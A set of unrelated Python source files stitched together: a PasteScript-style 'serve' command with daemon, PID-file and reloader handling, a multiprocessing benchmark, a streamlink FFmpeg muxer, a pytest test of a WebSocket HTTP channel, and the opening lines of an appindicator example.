def _set_message(self, value):
"""Setter for 'message'; needed only to override deprecation
in BaseException."""
self.__message = value
# BaseException.message has been deprecated since Python 2.6.
# To prevent DeprecationWarning from popping up over this
# pre-existing attribute, use a new property that takes lookup
# precedence.
message = property(_get_message, _set_message)
class NoDefault(object):
pass
# run and invoke methods moved below ServeCommand
class Command(object):
def __init__(self, name):
self.command_name = name
max_args = None
max_args_error = 'You must provide no more than %(max_args)s arguments'
min_args = None
min_args_error = 'You must provide at least %(min_args)s arguments'
required_args = None
# If this command takes a configuration file, set this to 1 or -1
# Then if invoked through #! the config file will be put into the positional
# arguments -- at the beginning with 1, at the end with -1
takes_config_file = None
# Grouped in help messages by this:
group_name = ''
required_args = ()
description = None
usage = ''
hidden = False
# This is the default verbosity level; --quiet subtracts,
# --verbose adds:
default_verbosity = 0
# This is the default interactive state:
default_interactive = 0
return_code = 0
BadCommand = BadCommand
# Must define:
# parser
# summary
# command()
def run(self, args):
self.parse_args(args)
# Setup defaults:
for name, default in [('verbose', 0),
('quiet', 0),
('interactive', False),
('overwrite', False)]:
if not hasattr(self.options, name):
setattr(self.options, name, default)
if getattr(self.options, 'simulate', False):
self.options.verbose = max(self.options.verbose, 1)
self.interactive = self.default_interactive
if getattr(self.options, 'interactive', False):
self.interactive += self.options.interactive
if getattr(self.options, 'no_interactive', False):
self.interactive = False
self.verbose = self.default_verbosity
self.verbose += self.options.verbose
self.verbose -= self.options.quiet
self.simulate = getattr(self.options, 'simulate', False)
# For #! situations:
if os.environ.get('PASTE_CONFIG_FILE') and self.takes_config_file is not None:
take = self.takes_config_file
filename = os.environ.get('PASTE_CONFIG_FILE')
if take == 1:
self.args.insert(0, filename)
elif take == -1:
self.args.append(filename)
else:
assert 0, (
"Value takes_config_file must be None, 1, or -1 (not %r)"
% take)
if os.environ.get('PASTE_DEFAULT_QUIET'):
self.verbose = 0
# Validate:
if self.min_args is not None and len(self.args) < self.min_args:
raise BadCommand(
self.min_args_error % {'min_args': self.min_args,
'actual_args': len(self.args)})
if self.max_args is not None and len(self.args) > self.max_args:
raise BadCommand(
self.max_args_error % {'max_args': self.max_args,
'actual_args': len(self.args)})
for var_name, option_name in self.required_args:
if not getattr(self.options, var_name, None):
raise BadCommand(
'You must provide the option %s' % option_name)
result = self.command()
if result is None:
return self.return_code
else:
return result
def parse_args(self, args):
if self.usage:
usage = ' ' + self.usage
else:
usage = ''
self.parser.usage = "%%prog [options]%s\n%s" % (
usage, self.summary)
self.parser.prog = self._prog_name()
if self.description:
desc = self.description
desc = textwrap.dedent(desc)
self.parser.description = desc
self.options, self.args = self.parser.parse_args(args)
def _prog_name(self):
return '%s %s' % (os.path.basename(sys.argv[0]), self.command_name)
########################################
# Utility methods
########################################
def pad(self, s, length, dir='left'):
if len(s) >= length:
return s
if dir == 'left':
return s + ' ' * (length - len(s))
else:
return ' ' * (length - len(s)) + s
def standard_parser(cls, verbose=True,
interactive=False,
no_interactive=False,
simulate=False,
quiet=False,
overwrite=False):
"""
Create a standard ``OptionParser`` instance.
Typically used like::
class MyCommand(Command):
parser = Command.standard_parser()
Subclasses may redefine ``standard_parser``, so use the
nearest superclass's class method.
"""
parser = BoolOptionParser()
if verbose:
parser.add_option('-v', '--verbose',
action='count',
dest='verbose',
default=0)
if quiet:
parser.add_option('-q', '--quiet',
action='count',
dest='quiet',
default=0)
if no_interactive:
parser.add_option('--no-interactive',
action="count",
dest="no_interactive",
default=0)
if interactive:
parser.add_option('-i', '--interactive',
action='count',
dest='interactive',
default=0)
if simulate:
parser.add_option('-n', '--simulate',
action='store_true',
dest='simulate',
default=False)
if overwrite:
parser.add_option('-f', '--overwrite',
dest="overwrite",
action="store_true",
help="Overwrite files (warnings will be emitted for non-matching files otherwise)")
return parser
standard_parser = classmethod(standard_parser)
def quote_first_command_arg(self, arg):
"""
There's a bug in Windows when running an executable that's
located inside a path with a space in it. This method handles
that case, or on non-Windows systems or an executable with no
spaces, it just leaves well enough alone.
"""
if sys.platform != 'win32' or ' ' not in arg:
# Problem does not apply:
return arg
try:
import win32api
except ImportError:
raise ValueError(
"The executable %r contains a space, and in order to "
"handle this issue you must have the win32api module "
"installed" % arg)
arg = win32api.GetShortPathName(arg)
return arg
def parse_vars(self, args):
"""
Given variables like ``['a=b', 'c=d']`` turns it into ``{'a':
'b', 'c': 'd'}``
"""
result = {}
for arg in args:
if '=' not in arg:
raise BadCommand(
'Variable assignment %r invalid (no "=")'
% arg)
name, value = arg.split('=', 1)
result[name] = value
return result
def logging_file_config(self, config_file):
"""
Setup logging via the logging module's fileConfig function with the
specified ``config_file``, if applicable.
ConfigParser defaults are specified for the special ``__file__``
and ``here`` variables, similar to PasteDeploy config loading.
"""
parser = configparser.ConfigParser()
parser.read([config_file])
if parser.has_section('loggers'):
config_file = os.path.abspath(config_file)
fileConfig(config_file, dict(__file__=config_file,
here=os.path.dirname(config_file)))
class NotFoundCommand(Command):
def run(self, args):
print('Command %r not known (you may need to run setup.py egg_info)'
% self.command_name)
commands = list()
commands.sort()
if not commands:
print('No commands registered.')
print('Have you installed Paste Script?')
print('(try running python setup.py develop)')
return 2
print('Known commands:')
longest = max([len(n) for n, c in commands])
for name, command in commands:
print(' %s %s' % (self.pad(name, length=longest),
command.load().summary))
return 2
# ---- From paste.script.serve ----------------------------------------
MAXFD = 1024
jython = sys.platform.startswith('java')
class DaemonizeException(Exception):
pass
class ServeCommand(Command):
min_args = 0
usage = 'CONFIG_FILE [start|stop|restart|status] [var=value]'
takes_config_file = 1
summary = "Serve the described application"
description = """\
This command serves a web application that uses a paste.deploy
configuration file for the server and application.
If start/stop/restart is given, then --daemon is implied, and it will
start (normal operation), stop (--stop-daemon), or do both.
You can also include variable assignments like 'http_port=8080'
and then use %(http_port)s in your config files.
"""
# used by subclasses that configure apps and servers differently
requires_config_file = True
parser = Command.standard_parser(quiet=True)
parser.add_option('-n', '--app-name',
dest='app_name',
metavar='NAME',
help="Load the named application (default main)")
parser.add_option('-s', '--server',
dest='server',
metavar='SERVER_TYPE',
help="Use the named server.")
parser.add_option('--server-name',
dest='server_name',
metavar='SECTION_NAME',
help="Use the named server as defined in the configuration file (default: main)")
if hasattr(os, 'fork'):
parser.add_option('--daemon',
dest="daemon",
action="store_true",
help="Run in daemon (background) mode")
parser.add_option('--pid-file',
dest='pid_file',
metavar='FILENAME',
help="Save PID to file (default to paster.pid if running in daemon mode)")
parser.add_option('--log-file',
dest='log_file',
metavar='LOG_FILE',
help="Save output to the given log file (redirects stdout)")
parser.add_option('--reload',
dest='reload',
action='store_true',
help="Use auto-restart file monitor")
parser.add_option('--reload-interval',
dest='reload_interval',
default=1,
help="Seconds between checking files (low number can cause significant CPU usage)")
parser.add_option('--monitor-restart',
dest='monitor_restart',
action='store_true',
help="Auto-restart server if it dies")
parser.add_option('--status',
action='store_true',
dest='show_status',
help="Show the status of the (presumably daemonized) server")
if hasattr(os, 'setuid'):
# I don't think these are available on Windows
parser.add_option('--user',
dest='set_user',
metavar="USERNAME",
help="Set the user (usually only possible when run as root)")
parser.add_option('--group',
dest='set_group',
metavar="GROUP",
help="Set the group (usually only possible when run as root)")
parser.add_option('--stop-daemon',
dest='stop_daemon',
action='store_true',
help='Stop a daemonized server (given a PID file, or default paster.pid file)')
if jython:
parser.add_option('--disable-jython-reloader',
action='store_true',
dest='disable_jython_reloader',
help="Disable the Jython reloader")
_scheme_re = re.compile(r'^[a-z][a-z]+:', re.I)
default_verbosity = 1
_reloader_environ_key = 'PYTHON_RELOADER_SHOULD_RUN'
_monitor_environ_key = 'PASTE_MONITOR_SHOULD_RUN'
possible_subcommands = ('start', 'stop', 'restart', 'status')
def command(self):
if self.options.stop_daemon:
return self.stop_daemon()
if not hasattr(self.options, 'set_user'):
# Windows case:
self.options.set_user = self.options.set_group = None
# @@: Is this the right stage to set the user at?
self.change_user_group(
self.options.set_user, self.options.set_group)
if self.requires_config_file:
if not self.args:
raise BadCommand('You must give a config file')
app_spec = self.args[0]
if len(self.args) > 1 and self.args[1] in self.possible_subcommands:
cmd = self.args[1]
restvars = self.args[2:]
else:
cmd = None
restvars = self.args[1:]
else:
app_spec = ""
if self.args and self.args[0] in self.possible_subcommands:
cmd = self.args[0]
restvars = self.args[1:]
else:
cmd = None
restvars = self.args[:]
if (getattr(self.options, 'daemon', False) and
getattr(self.options, 'reload', False)):
raise BadCommand('The --daemon and --reload options may not be used together')
jython_monitor = False
if self.options.reload:
if jython and not self.options.disable_jython_reloader:
# JythonMonitor raises the special SystemRestart
# exception that'll cause the Jython interpreter to
# reload in the existing Java process (avoiding
# subprocess startup time)
try:
from paste.reloader import JythonMonitor
except ImportError:
pass
else:
jython_monitor = JythonMonitor(poll_interval=int(
self.options.reload_interval))
if self.requires_config_file:
jython_monitor.watch_file(self.args[0])
if not jython_monitor:
if os.environ.get(self._reloader_environ_key):
from paste import reloader
if self.verbose > 1:
print('Running reloading file monitor')
reloader.install(int(self.options.reload_interval))
if self.requires_config_file:
reloader.watch_file(self.args[0])
else:
return self.restart_with_reloader()
if cmd not in (None, 'start', 'stop', 'restart', 'status'):
raise BadCommand(
'Error: must give start|stop|restart (not %s)' % cmd)
if cmd == 'status' or self.options.show_status:
return self.show_status()
if cmd == 'restart' or cmd == 'stop':
result = self.stop_daemon()
if result:
print("Could not stop daemon")
# It's ok to continue trying to restart if stop_daemon returns
# a 1, otherwise shortcut and return.
if cmd == 'restart' and result != 1:
return result
if cmd == 'stop':
return result
self.options.daemon = True
if cmd == 'start':
self.options.daemon = True
app_name = self.options.app_name
vars = self.parse_vars(restvars)
if not self._scheme_re.search(app_spec):
app_spec = 'config:' + app_spec
server_name = self.options.server_name
if self.options.server:
server_spec = 'egg:PasteScript'
assert server_name is None
server_name = self.options.server
else:
server_spec = app_spec
base = os.getcwd()
if getattr(self.options, 'daemon', False):
if not self.options.pid_file:
self.options.pid_file = 'paster.pid'
if not self.options.log_file:
self.options.log_file = 'paster.log'
# Ensure the log file is writeable
if self.options.log_file:
try:
writeable_log_file = open(self.options.log_file, 'a')
except IOError as ioe:
msg = 'Error: Unable to write to log file: %s' % ioe
raise BadCommand(msg)
writeable_log_file.close()
# Ensure the pid file is writeable
if self.options.pid_file:
try:
writeable_pid_file = open(self.options.pid_file, 'a')
except IOError as ioe:
msg = 'Error: Unable to write to pid file: %s' % ioe
raise BadCommand(msg)
writeable_pid_file.close()
if getattr(self.options, 'daemon', False):
try:
self.daemonize()
except DaemonizeException as ex:
if self.verbose > 0:
print(str(ex))
return
if (self.options.monitor_restart and not
os.environ.get(self._monitor_environ_key)):
return self.restart_with_monitor()
if self.options.pid_file:
self.record_pid(self.options.pid_file)
if self.options.log_file:
stdout_log = LazyWriter(self.options.log_file, 'a')
sys.stdout = stdout_log
sys.stderr = stdout_log
logging.basicConfig(stream=stdout_log)
log_fn = app_spec
if log_fn.startswith('config:'):
log_fn = app_spec[len('config:'):]
elif log_fn.startswith('egg:'):
log_fn = None
if log_fn:
log_fn = os.path.join(base, log_fn)
self.logging_file_config(log_fn)
server = loadserver(server_spec, name=server_name, relative_to=base, global_conf=vars)
app = loadapp(app_spec, name=app_name, relative_to=base, global_conf=vars)
if self.verbose > 0:
if hasattr(os, 'getpid'):
msg = 'Starting server in PID %i.' % os.getpid()
else:
msg = 'Starting server.'
print(msg)
def serve():
try:
server(app)
except (SystemExit, KeyboardInterrupt) as e:
if self.verbose > 1:
raise
if str(e):
msg = ' ' + str(e)
else:
msg = ''
print('Exiting%s (-v to see traceback)' % msg)
except AttributeError as e:
# Capturing bad error response from paste
if str(e) == "'WSGIThreadPoolServer' object has no attribute 'thread_pool'":
raise socket.error(98, 'Address already in use')
else:
raise AttributeError(e)
if jython_monitor:
            # JythonMonitor has to be run from the main thread
threading.Thread(target=serve).start()
print('Starting Jython file monitor')
jython_monitor.periodic_reload()
else:
serve()
def daemonize(self):
pid = live_pidfile(self.options.pid_file)
if pid:
raise DaemonizeException(
"Daemon is already running (PID: %s from PID file %s)"
% (pid, self.options.pid_file))
if self.verbose > 0:
print('Entering daemon mode')
pid = os.fork()
if pid:
# The forked process also has a handle on resources, so we
# *don't* want proper termination of the process, we just
# want to exit quick (which os._exit() does)
os._exit(0)
# Make this the session leader
os.setsid()
# Fork again for good measure!
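        # (the second fork ensures the daemon is not a session leader and so
        # can never reacquire a controlling terminal)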
pid = os.fork()
if pid:
os._exit(0)
# @@: Should we set the umask and cwd now?
maxfd = resource.getrlimit(resource.RLIMIT_NOFILE)[1]
if maxfd == resource.RLIM_INFINITY:
maxfd = MAXFD
# Iterate through and close all file descriptors.
for fd in range(0, maxfd):
try:
os.close(fd)
except OSError: # ERROR, fd wasn't open to begin with (ignored)
pass
if hasattr(os, "devnull"):
REDIRECT_TO = os.devnull
else:
REDIRECT_TO = "/dev/null"
os.open(REDIRECT_TO, os.O_RDWR) # standard input (0)
# Duplicate standard input to standard output and standard error.
os.dup2(0, 1) # standard output (1)
os.dup2(0, 2) # standard error (2)
def record_pid(self, pid_file):
pid = os.getpid()
if self.verbose > 1:
print('Writing PID %s to %s' % (pid, pid_file))
f = open(pid_file, 'w')
f.write(str(pid))
f.close()
atexit.register(_remove_pid_file, pid, pid_file, self.verbose)
def stop_daemon(self):
pid_file = self.options.pid_file or 'paster.pid'
if not os.path.exists(pid_file):
print('No PID file exists in %s' % pid_file)
return 1
pid = read_pidfile(pid_file)
if not pid:
print("Not a valid PID file in %s" % pid_file)
return 1
pid = live_pidfile(pid_file)
if not pid:
print("PID in %s is not valid (deleting)" % pid_file)
try:
os.unlink(pid_file)
except (OSError, IOError) as e:
print("Could not delete: %s" % e)
return 2
return 1
for _i in range(10):
if not live_pidfile(pid_file):
break
os.kill(pid, signal.SIGTERM)
time.sleep(1)
else:
print("failed to kill web process %s" % pid)
return 3
if os.path.exists(pid_file):
os.unlink(pid_file)
return 0
def show_status(self):
pid_file = self.options.pid_file or 'paster.pid'
if not os.path.exists(pid_file):
print('No PID file %s' % pid_file)
return 1
pid = read_pidfile(pid_file)
if not pid:
print('No PID in file %s' % pid_file)
return 1
pid = live_pidfile(pid_file)
if not pid:
print('PID %s in %s is not running' % (pid, pid_file))
return 1
print('Server running in PID %s' % pid)
return 0
def restart_with_reloader(self):
        return self.restart_with_monitor(reloader=True)
def restart_with_monitor(self, reloader=False):
if self.verbose > 0:
if reloader:
print('Starting subprocess with file monitor')
else:
print('Starting subprocess with monitor parent')
while 1:
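            # Re-exec this same script in a child process; the parent only
            # supervises, restarting the child whenever it exits (or, for the
            # reloader case, whenever it exits with code 3).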
args = [self.quote_first_command_arg(sys.executable)] + sys.argv
new_environ = os.environ.copy()
if reloader:
new_environ[self._reloader_environ_key] = 'true'
else:
new_environ[self._monitor_environ_key] = 'true'
proc = None
try:
try:
_turn_sigterm_into_systemexit()
proc = subprocess.Popen(args, env=new_environ)
exit_code = proc.wait()
proc = None
except KeyboardInterrupt:
print('^C caught in monitor process')
if self.verbose > 1:
raise
return 1
finally:
if proc is not None and hasattr(os, 'kill'):
try:
os.kill(proc.pid, signal.SIGTERM)
except (OSError, IOError):
pass
if reloader:
# Reloader always exits with code 3; but if we are
# a monitor, any exit code will restart
if exit_code != 3:
return exit_code
if self.verbose > 0:
print('-' * 20, 'Restarting', '-' * 20)
def change_user_group(self, user, group):
if not user and not group:
return
uid = gid = None
if group:
try:
gid = int(group)
group = grp.getgrgid(gid).gr_name
except ValueError:
try:
entry = grp.getgrnam(group)
except KeyError:
raise BadCommand(
"Bad group: %r; no such group exists" % group)
gid = entry.gr_gid
try:
uid = int(user)
user = pwd.getpwuid(uid).pw_name
except ValueError:
try:
entry = pwd.getpwnam(user)
except KeyError:
raise BadCommand(
"Bad username: %r; no such user exists" % user)
if not gid:
gid = entry.pw_gid
uid = entry.pw_uid
if self.verbose > 0:
print('Changing user to %s:%s (%s:%s)' % (
user, group or '(unknown)', uid, gid))
if hasattr(os, 'initgroups'):
os.initgroups(user, gid)
else:
os.setgroups([e.gr_gid for e in grp.getgrall()
if user in e.gr_mem] + [gid])
if gid:
os.setgid(gid)
if uid:
os.setuid(uid)
class LazyWriter(object):
"""
File-like object that opens a file lazily when it is first written
to.
"""
def __init__(self, filename, mode='w'):
self.filename = filename
self.fileobj = None
self.lock = threading.Lock()
self.mode = mode
def open(self):
if self.fileobj is None:
self.lock.acquire()
try:
if self.fileobj is None:
self.fileobj = open(self.filename, self.mode)
finally:
self.lock.release()
return self.fileobj
def write(self, text):
fileobj = self.open()
fileobj.write(text)
fileobj.flush()
def writelines(self, text):
fileobj = self.open()
fileobj.writelines(text)
fileobj.flush()
def flush(self):
self.open().flush()
def live_pidfile(pidfile):
"""(pidfile:str) -> int | None
Returns an int found in the named file, if there is one,
and if there is a running process with that process id.
Return None if no such process exists.
"""
pid = read_pidfile(pidfile)
if pid:
try:
os.kill(int(pid), 0)
return pid
except OSError as e:
if e.errno == errno.EPERM:
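                # EPERM means the process exists but we are not allowed to
                # signal it, so it still counts as a live PID.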
return pid
return None
def read_pidfile(filename):
if os.path.exists(filename):
try:
f = open(filename)
content = f.read()
f.close()
return int(content.strip())
except (ValueError, IOError):
return None
else:
return None
def _remove_pid_file(written_pid, filename, verbosity):
current_pid = os.getpid()
if written_pid != current_pid:
# A forked process must be exiting, not the process that
# wrote the PID file
return
if not os.path.exists(filename):
return
f = open(filename)
content = f.read().strip()
f.close()
try:
pid_in_file = int(content)
except ValueError:
pass
else:
if pid_in_file != current_pid:
print("PID file %s contains %s, not expected PID %s" % (
filename, pid_in_file, current_pid))
return
if verbosity > 0:
print("Removing PID file %s" % filename)
try:
os.unlink(filename)
return
except OSError as e:
# Record, but don't give traceback
print("Cannot remove PID file: %s" % e)
    # well, at least let's not leave the invalid PID around...
try:
f = open(filename, 'w')
f.write('')
f.close()
except OSError as e:
        print('Stale PID left in file: %s (%s)' % (filename, e))
else:
print('Stale PID removed')
def ensure_port_cleanup(bound_addresses, maxtries=30, sleeptime=2):
"""
This makes sure any open ports are closed.
Does this by connecting to them until they give connection
refused. Servers should call like::
import paste.script
ensure_port_cleanup([80, 443])
"""
atexit.register(_cleanup_ports, bound_addresses, maxtries=maxtries,
sleeptime=sleeptime)
def _cleanup_ports(bound_addresses, maxtries=30, sleeptime=2):
    # Wait for the server to release the port: keep connecting until the
    # connection is refused.
for bound_address in bound_addresses:
for _i in range(maxtries):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(bound_address)
except socket.error as e:
if e.errno != errno.ECONNREFUSED:
raise
break
else:
time.sleep(sleeptime)
else:
raise SystemExit('Timeout waiting for port.')
sock.close()
def _turn_sigterm_into_systemexit():
"""
    Attempts to turn a SIGTERM signal into a SystemExit exception.
"""
def handle_term(signo, frame):
raise SystemExit
signal.signal(signal.SIGTERM, handle_term)
# ---- from paste.script.command --------------------------------------
python_version = sys.version.splitlines()[0].strip()
parser = optparse.OptionParser(add_help_option=False,
# version='%s from %s (python %s)'
# % (dist, dist.location, python_version),
usage='%prog [paster_options] COMMAND [command_options]')
parser.add_option(
'-h', '--help',
action='store_true',
dest='do_help',
help="Show this help message")
parser.disable_interspersed_args()
# @@: Add an option to run this in another Python interpreter
commands = {
'serve': ServeCommand
}
def run(args=None):
if (not args and len(sys.argv) >= 2 and os.environ.get('_') and
sys.argv[0] != os.environ['_'] and os.environ['_'] == sys.argv[1]):
# probably it's an exe execution
args = ['exe', os.environ['_']] + sys.argv[2:]
if args is None:
args = sys.argv[1:]
options, args = parser.parse_args(args)
options.base_parser = parser
if options.do_help:
args = ['help'] + args
if not args:
print('Usage: %s COMMAND' % sys.argv[0])
args = ['help']
command_name = args[0]
if command_name not in commands:
command = NotFoundCommand
else:
command = commands[command_name]
invoke(command, command_name, options, args[1:])
def invoke(command, command_name, options, args):
try:
runner = command(command_name)
exit_code = runner.run(args)
except BadCommand as e:
print(e)
exit_code = e.exit_code
sys.exit(exit_code)
|
mp_benchmarks.py
|
#
# Simple benchmarks for the multiprocessing package
#
# Copyright (c) 2006-2008, R Oudkerk
# All rights reserved.
#
import time
import multiprocessing
import threading
import queue
import gc
_timer = time.perf_counter
delta = 1
#### TEST_QUEUESPEED
def queuespeed_func(q, c, iterations):
a = '0' * 256
c.acquire()
c.notify()
c.release()
for i in range(iterations):
q.put(a)
q.put('STOP')
def test_queuespeed(Process, q, c):
elapsed = 0
iterations = 1
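    # Double the workload until one run takes at least `delta` seconds, so the
    # measurement is long enough to be meaningful.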
while elapsed < delta:
iterations *= 2
p = Process(target=queuespeed_func, args=(q, c, iterations))
c.acquire()
p.start()
c.wait()
c.release()
result = None
t = _timer()
while result != 'STOP':
result = q.get()
elapsed = _timer() - t
p.join()
print(iterations, 'objects passed through the queue in', elapsed, 'seconds')
print('average number/sec:', iterations/elapsed)
#### TEST_PIPESPEED
def pipe_func(c, cond, iterations):
a = '0' * 256
cond.acquire()
cond.notify()
cond.release()
for i in range(iterations):
c.send(a)
c.send('STOP')
def test_pipespeed():
c, d = multiprocessing.Pipe()
cond = multiprocessing.Condition()
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
p = multiprocessing.Process(target=pipe_func,
args=(d, cond, iterations))
cond.acquire()
p.start()
cond.wait()
cond.release()
result = None
t = _timer()
while result != 'STOP':
result = c.recv()
elapsed = _timer() - t
p.join()
print(iterations, 'objects passed through connection in',elapsed,'seconds')
print('average number/sec:', iterations/elapsed)
#### TEST_SEQSPEED
def test_seqspeed(seq):
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
t = _timer()
for i in range(iterations):
a = seq[5]
elapsed = _timer() - t
print(iterations, 'iterations in', elapsed, 'seconds')
print('average number/sec:', iterations/elapsed)
#### TEST_LOCK
def test_lockspeed(l):
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
t = _timer()
for i in range(iterations):
l.acquire()
l.release()
elapsed = _timer() - t
print(iterations, 'iterations in', elapsed, 'seconds')
print('average number/sec:', iterations/elapsed)
#### TEST_CONDITION
def conditionspeed_func(c, N):
c.acquire()
c.notify()
for i in range(N):
c.wait()
c.notify()
c.release()
def test_conditionspeed(Process, c):
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
c.acquire()
p = Process(target=conditionspeed_func, args=(c, iterations))
p.start()
c.wait()
t = _timer()
for i in range(iterations):
c.notify()
c.wait()
elapsed = _timer() - t
c.release()
p.join()
print(iterations * 2, 'waits in', elapsed, 'seconds')
print('average number/sec:', iterations * 2 / elapsed)
####
def test():
manager = multiprocessing.Manager()
gc.disable()
print('\n\t######## testing Queue.Queue\n')
test_queuespeed(threading.Thread, queue.Queue(),
threading.Condition())
print('\n\t######## testing multiprocessing.Queue\n')
test_queuespeed(multiprocessing.Process, multiprocessing.Queue(),
multiprocessing.Condition())
print('\n\t######## testing Queue managed by server process\n')
test_queuespeed(multiprocessing.Process, manager.Queue(),
manager.Condition())
print('\n\t######## testing multiprocessing.Pipe\n')
test_pipespeed()
print()
print('\n\t######## testing list\n')
test_seqspeed(list(range(10)))
print('\n\t######## testing list managed by server process\n')
test_seqspeed(manager.list(list(range(10))))
print('\n\t######## testing Array("i", ..., lock=False)\n')
test_seqspeed(multiprocessing.Array('i', list(range(10)), lock=False))
print('\n\t######## testing Array("i", ..., lock=True)\n')
test_seqspeed(multiprocessing.Array('i', list(range(10)), lock=True))
print()
print('\n\t######## testing threading.Lock\n')
test_lockspeed(threading.Lock())
print('\n\t######## testing threading.RLock\n')
test_lockspeed(threading.RLock())
print('\n\t######## testing multiprocessing.Lock\n')
test_lockspeed(multiprocessing.Lock())
print('\n\t######## testing multiprocessing.RLock\n')
test_lockspeed(multiprocessing.RLock())
print('\n\t######## testing lock managed by server process\n')
test_lockspeed(manager.Lock())
print('\n\t######## testing rlock managed by server process\n')
test_lockspeed(manager.RLock())
print()
print('\n\t######## testing threading.Condition\n')
test_conditionspeed(threading.Thread, threading.Condition())
print('\n\t######## testing multiprocessing.Condition\n')
test_conditionspeed(multiprocessing.Process, multiprocessing.Condition())
print('\n\t######## testing condition managed by a server process\n')
test_conditionspeed(multiprocessing.Process, manager.Condition())
gc.enable()
if __name__ == '__main__':
multiprocessing.freeze_support()
test()
|
ffmpegmux.py
|
import os
import random
import threading
import subprocess
import sys
from streamlink.stream import Stream
from streamlink.stream.stream import StreamIO
from streamlink.utils import NamedPipe
from streamlink.compat import devnull, which
from streamlink.exceptions import StreamError  # raised by FFMPEGMuxer.__init__ when FFmpeg is unavailable
class MuxedStream(Stream):
__shortname__ = "muxed-stream"
def __init__(self, session, *substreams, **options):
super(MuxedStream, self).__init__(session)
self.substreams = substreams
self.options = options
def open(self):
fds = []
for substream in self.substreams:
fds.append(substream and substream.open())
return FFMPEGMuxer(self.session, *fds, **self.options).open()
@classmethod
def is_usable(cls, session):
return FFMPEGMuxer.is_usable(session)
class FFMPEGMuxer(StreamIO):
__commands__ = ['ffmpeg', 'ffmpeg.exe', 'avconv', 'avconv.exe']
@staticmethod
def copy_to_pipe(self, stream, pipe):
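        # Note: although declared as a staticmethod, this is invoked as a plain
        # function with the muxer instance passed explicitly as the first
        # argument by the pipe threads created in __init__ below.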
self.logger.debug("Starting copy to pipe: {}".format(pipe.path))
pipe.open("wb")
while not stream.closed:
try:
data = stream.read(8192)
if len(data):
pipe.write(data)
else:
break
except IOError:
self.logger.error("Pipe copy aborted: {}".format(pipe.path))
return
try:
pipe.close()
except IOError: # might fail closing, but that should be ok for the pipe
pass
self.logger.debug("Pipe copy complete: {}".format(pipe.path))
def __init__(self, session, *streams, **options):
if not self.is_usable(session):
raise StreamError("cannot use FFMPEG")
self.session = session
self.process = None
self.logger = session.logger.new_module("stream.mp4mux-ffmpeg")
self.streams = streams
self.pipes = [NamedPipe("foo-{}-{}".format(os.getpid(), random.randint(0, 1000))) for _ in self.streams]
self.pipe_threads = [threading.Thread(target=self.copy_to_pipe, args=(self, stream, np))
for stream, np in
zip(self.streams, self.pipes)]
ofmt = options.pop("format", "matroska")
outpath = options.pop("outpath", "pipe:1")
videocodec = session.options.get("ffmpeg-video-transcode") or options.pop("vcodec", "copy")
audiocodec = session.options.get("ffmpeg-audio-transcode") or options.pop("acodec", "copy")
metadata = options.pop("metadata", {})
self._cmd = [self.command(session), '-nostats', '-y']
for np in self.pipes:
self._cmd.extend(["-i", np.path])
self._cmd.extend(['-c:v', videocodec])
self._cmd.extend(['-c:a', audiocodec])
for stream, data in metadata.items():
for datum in data:
self._cmd.extend(["-metadata:{0}".format(stream), datum])
self._cmd.extend(['-f', ofmt, outpath])
self.logger.debug("ffmpeg command: {}".format(' '.join(self._cmd)))
self.close_errorlog = False
if session.options.get("ffmpeg-verbose"):
self.errorlog = sys.stderr
elif session.options.get("ffmpeg-verbose-path"):
self.errorlog = open(session.options.get("ffmpeg-verbose-path"), "w")
self.close_errorlog = True
else:
self.errorlog = devnull()
def open(self):
for t in self.pipe_threads:
t.daemon = True
t.start()
self.process = subprocess.Popen(self._cmd, stdout=subprocess.PIPE, stderr=self.errorlog)
return self
@classmethod
def is_usable(cls, session):
return cls.command(session) is not None
@classmethod
def command(cls, session):
command = []
if session.options.get("ffmpeg-ffmpeg"):
command.append(session.options.get("ffmpeg-ffmpeg"))
for cmd in command or cls.__commands__:
if which(cmd):
return cmd
def read(self, size=-1):
data = self.process.stdout.read(size)
return data
def close(self):
self.logger.debug("Closing ffmpeg thread")
if self.process:
# kill ffmpeg
self.process.kill()
self.process.stdout.close()
# close the streams
for stream in self.streams:
if hasattr(stream, "close"):
stream.close()
self.logger.debug("Closed all the substreams")
if self.close_errorlog:
self.errorlog.close()
self.errorlog = None
|
test_uws.py
|
#!/usr/bin/env python3
# vim: sts=4 sw=4 et
import http.client
import os
import pytest
import threading
import urllib.request
from tll import asynctll
from tll.channel import Context
class Test:
def setup(self):
self.ctx = Context()
self.ctx.load(os.path.join(os.environ.get("BUILD_DIR", "build"), "tll-uws"), 'channel_module')
self.loop = asynctll.Loop(context=self.ctx)
self.server = self.loop.Channel('ws://*:8080', name='server')
self.thread_event = self.loop.Channel("direct://", name='thread/tll', dump='text')
self.main_event = self.ctx.Channel("direct://", name='thread/main', master=self.thread_event)
self.channels = []
self.thread = None
self.thread_stop = threading.Event()
self.thread_error = None
self.thread_event.open()
self.main_event.open()
def teardown(self):
if self.thread:
self.thread_stop.set()
self.thread.join()
self.thread = None
self.thread_stop = None
self.thread_error = None
if self.loop:
self.loop.stop = 1
self.loop = None
for c in self.channels + [self.thread_event, self.main_event]:
c.close()
self.thread_event = None
self.main_event = None
self.channels = []
if self.server:
self.server.close()
self.server = None
self.ctx = None
def http(self, *a, **kw):
conn = http.client.HTTPConnection('::1', 8080, timeout=1)
conn.request(*a, **kw)
return conn.getresponse()
def test_http(self):
sub = self.loop.Channel("ws+http://path", master=self.server, name='server/http', dump='yes');
self.channels = [sub]
self.server.open()
def process(self, sub):
async def main():
m = await self.thread_event.recv()
assert m.data.tobytes() == b'open'
sub.open()
m = await sub.recv()
assert m.type == m.Type.Control
sub.post(b'hello', addr=m.addr)
m = await self.thread_event.recv()
assert m.data.tobytes() == b'done'
try:
self.loop.run(main())
except Exception as e:
self.thread_error = e
raise
self.thread = threading.Thread(target=process, args=(self, sub))
self.thread.start()
r = self.http('GET', '/')
assert r.status == 404
assert self.thread_error == None, self.thread_error
self.main_event.post(b'open')
r = self.http('GET', '/')
assert r.status == 404
assert self.thread_error == None, self.thread_error
r = self.http('GET', '/path')
assert r.status == 200
assert r.read() == b'hello'
assert self.thread_error == None, self.thread_error
self.main_event.post(b'done')
self.loop.stop = 1
self.thread.join()
assert self.thread_error == None, self.thread_error
|
force-appindicator.py
|
import pathlib, sys, time, threading
# Make the example find UltraSystray relative to itself
